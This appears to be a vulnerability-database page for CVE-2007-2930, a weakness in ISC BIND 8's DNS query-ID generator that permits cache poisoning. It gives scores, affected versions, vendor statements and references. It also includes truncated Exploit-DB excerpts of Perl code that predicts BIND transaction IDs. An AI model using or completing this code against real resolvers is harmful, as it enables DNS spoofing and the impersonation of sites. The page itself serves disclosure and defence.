CVE-2007-2930
published 2007-09-12CVE-2007-2930: The (1) NSID_SHUFFLE_ONLY and (2) NSID_USE_POOL PRNG algorithms in ISC BIND 8 before 8.4.7-P1 generate predictable DNS query identifiers when sending outgoing…
PriorityP425medium4.3CVSS 2.0
AVNACMAuNCNIPAN
EXPLOIT
EPSS
7.58%
93.8th percentile
The (1) NSID_SHUFFLE_ONLY and (2) NSID_USE_POOL PRNG algorithms in ISC BIND 8 before 8.4.7-P1 generate predictable DNS query identifiers when sending outgoing queries such as NOTIFY messages when answering questions as a resolver, which allows remote attackers to poison DNS caches via unknown vectors. NOTE: this issue is different from CVE-2007-2926.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| isc | bind | <= 8.4.7 | — |
CVSS provenance
nvdv2.04.3MEDIUMAV:N/AC:M/Au:N/C:N/I:P/A:N
vendor_redhat4.3MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Red Hat
CVE-2007-2930: The (1) NSID_SHUFFLE_ONLY and (2) NSID_USE_POOL PRNG algorithms in ISC BIND 8 before 8
vendor_redhat·CVSS 4.3
CVE-2007-2930 [MEDIUM] CVE-2007-2930: The (1) NSID_SHUFFLE_ONLY and (2) NSID_USE_POOL PRNG algorithms in ISC BIND 8 before 8
The (1) NSID_SHUFFLE_ONLY and (2) NSID_USE_POOL PRNG algorithms in ISC BIND 8 before 8.4.7-P1 generate predictable DNS query identifiers when sending outgoing queries such as NOTIFY messages when answering questions as a resolver, which allows remote attackers to poison DNS caches via unknown vectors. NOTE: this issue is different from CVE-2007-2926.
Statement: Not vulnerable. This issue did not affect the versions of bind as shipped with Red Hat Enterprise Linux 2.1, 3, 4, or 5.
GHSA
GHSA-8m5r-mf8j-3hfx: The (1) NSID_SHUFFLE_ONLY and (2) NSID_USE_POOL PRNG algorithms in ISC BIND 8 before 8
ghsa_unreviewed·2022-05-01·CVSS 4.3
CVE-2007-2930 [MEDIUM] GHSA-8m5r-mf8j-3hfx: The (1) NSID_SHUFFLE_ONLY and (2) NSID_USE_POOL PRNG algorithms in ISC BIND 8 before 8
The (1) NSID_SHUFFLE_ONLY and (2) NSID_USE_POOL PRNG algorithms in ISC BIND 8 before 8.4.7-P1 generate predictable DNS query identifiers when sending outgoing queries such as NOTIFY messages when answering questions as a resolver, which allows remote attackers to poison DNS caches via unknown vectors. NOTE: this issue is different from CVE-2007-2926.
No detection rules found.
Exploit-DB
ISC BIND 8 - Remote Cache Poisoning (1)
exploitdb·2007-08-27
CVE-2007-2930 ISC BIND 8 - Remote Cache Poisoning (1)
ISC BIND 8 - Remote Cache Poisoning (1)
---
#source: https://www.securityfocus.com/bid/25459/info
#
#BIND 8 is prone to a remote cache-poisoning vulnerability because of weaknesses in its random-number generator.
#
#An attacker may leverage this issue to manipulate cache data, potentially facilitating man-in-the-middle, site-impersonation, or denial-of-service attacks.
#
#Versions of BIND from 8.2.0 through to 8.4.7 are vulnerable to this issue.
#
# Window of guessing
# (linear impact on runtime, but also improves success rate)
$WINDOW_SIZE=500;
# How many predictions will be generated per (a,z) candidate
# (actually twice that number)
$PREDICT_SIZE=500;
use Time::HiRes qw(gettimeofday);
# This table is copied as is from the BIND 8.4.7 source code
# (file ./src/bin/named/ns_main.c)
m
Exploit-DB
ISC BIND 8 - Remote Cache Poisoning (2)
exploitdb·2007-08-27
CVE-2007-2930 ISC BIND 8 - Remote Cache Poisoning (2)
ISC BIND 8 - Remote Cache Poisoning (2)
---
source: https://www.securityfocus.com/bid/25459/info
BIND 8 is prone to a remote cache-poisoning vulnerability because of weaknesses in its random-number generator.
An attacker may leverage this issue to manipulate cache data, potentially facilitating man-in-the-middle, site-impersonation, or denial-of-service attacks.
Versions of BIND from 8.2.0 through to 8.4.7 are vulnerable to this issue.
$TRXID1=$ARGV[0];
$TRXID2=$ARGV[1];
$TRXID3=$ARGV[2];
$d1=($TRXID2-$TRXID1) % 65536;
if (($d1 & 1) == 0)
{
die "Impossible: d1 is even";
}
$d2=($TRXID3-$TRXID2) % 65536;
if (($d2 & 1) == 0)
{
die "Impossible: d2 is even";
}
# Calculate $inv_d1=($d1)^(-1)
$inv_d1=1;
for (my $b=1;$b<=16;$b++)
{
if ((($d1*$inv_d1) % (1<<$b))!=1)
{
$inv_d1|=(1<<($b-1));
No writeups or analysis indexed.
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01283837http://secunia.com/advisories/26629http://secunia.com/advisories/26858http://secunia.com/advisories/27433http://secunia.com/advisories/27459http://secunia.com/advisories/27465http://secunia.com/advisories/27696http://sunsolve.sun.com/search/document.do?assetkey=1-26-103063-1http://sunsolve.sun.com/search/document.do?assetkey=1-66-200859-1http://support.avaya.com/elmodocs2/security/ASA-2007-448.htmhttp://support.nortel.com/go/main.jsp?cscat=BLTNDETAIL&id=653968http://www.ciac.org/ciac/bulletins/r-333.shtmlhttp://www.isc.org/index.pl?/sw/bind/bind8-eol.phphttp://www.kb.cert.org/vuls/id/927905http://www.securityfocus.com/archive/1/477870/100/100/threadedhttp://www.securityfocus.com/archive/1/481424/100/0/threadedhttp://www.securityfocus.com/archive/1/481659/100/0/threadedhttp://www.securityfocus.com/bid/25459http://www.securitytracker.com/id?1018615http://www.trusteer.com/docs/bind8dns.htmlhttp://www.vupen.com/english/advisories/2007/2991http://www.vupen.com/english/advisories/2007/3192http://www.vupen.com/english/advisories/2007/3639http://www.vupen.com/english/advisories/2007/3668http://www.vupen.com/english/advisories/2007/3936http://www116.nortel.com/pub/repository/CLARIFY/DOCUMENT/2007/43/022954-01.pdfhttp://www14.software.ibm.com/webapp/set2/subscriptions/pqvcmjd?mode=18&ID=3975https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A2154http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01283837http://secunia.com/advisories/26629http://secunia.com/advisories/26858http://secunia.com/advisories/27433http://secunia.com/advisories/27459http://secunia.com/advisories/27465http://secunia.com/advisories/27696http://sunsolve.sun.com/search/document.do?assetkey=1-26-103063-1http://sunsolve.sun.com/search/document.do?assetkey=1-66-200859-1http://support.avaya.com/elmodocs2/security/ASA-2007-448.htmhttp://support.nortel.com/go/main.jsp?cscat=BLTNDETAIL&id=653968http://www.ciac.org/ciac/bulletins/r-333.shtmlhttp://www.isc.org/index.pl?/sw/bind/bind8-eol.phphttp://www.kb.cert.org/vuls/id/927905http://www.securityfocus.com/archive/1/477870/100/100/threadedhttp://www.securityfocus.com/archive/1/481424/100/0/threadedhttp://www.securityfocus.com/archive/1/481659/100/0/threadedhttp://www.securityfocus.com/bid/25459http://www.securitytracker.com/id?1018615http://www.trusteer.com/docs/bind8dns.htmlhttp://www.vupen.com/english/advisories/2007/2991http://www.vupen.com/english/advisories/2007/3192http://www.vupen.com/english/advisories/2007/3639http://www.vupen.com/english/advisories/2007/3668http://www.vupen.com/english/advisories/2007/3936http://www116.nortel.com/pub/repository/CLARIFY/DOCUMENT/2007/43/022954-01.pdfhttp://www14.software.ibm.com/webapp/set2/subscriptions/pqvcmjd?mode=18&ID=3975https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A2154
2007-09-12
Published